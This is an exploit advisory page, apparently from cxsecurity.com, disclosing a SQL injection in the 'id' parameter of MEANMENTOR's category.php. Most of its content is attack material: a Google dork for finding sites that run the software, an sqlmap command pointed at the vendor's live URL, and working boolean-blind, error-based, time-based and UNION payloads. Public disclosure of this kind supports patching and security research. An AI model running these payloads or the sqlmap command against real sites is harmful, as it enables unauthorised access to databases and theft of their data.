MEANMENTOR - SQL Injection vulnerability

2020.12.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

**************************** #Exploit Title: MEANMENTOR - SQL Injection vulnerability #Date: 2020-12-24 #Exploit Author: darksecurity team #Vendor Homepage: https://meanmentor.com #Google Dork: "Powered by Meanmentor" #Tested On: windows 10 sqlmap: sqlmap -u "https://meanmentor.com/category.php?id=1" --dbs Testing Method; - boolean-based blind - UNION query - error-based - time-based blind - boolean-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 3332=3332 AND 'flEA'='flEA Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 3157 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(3157=3157,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Endc'='Endc Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 4308 FROM (SELECT(SLEEP(5)))eLis) AND 'JTMk'='JTMk Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=-9154' UNION ALL SELECT NULL,CONCAT(0x7170716271,0x6c57597368417552764c557562535179637944544b575778547959574365586847644b794b656343,0x7170766271)-- - ************************************************** #Discovered by: mjoker-mina_ah-mohammad_zo-reza_zo **************************************************


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top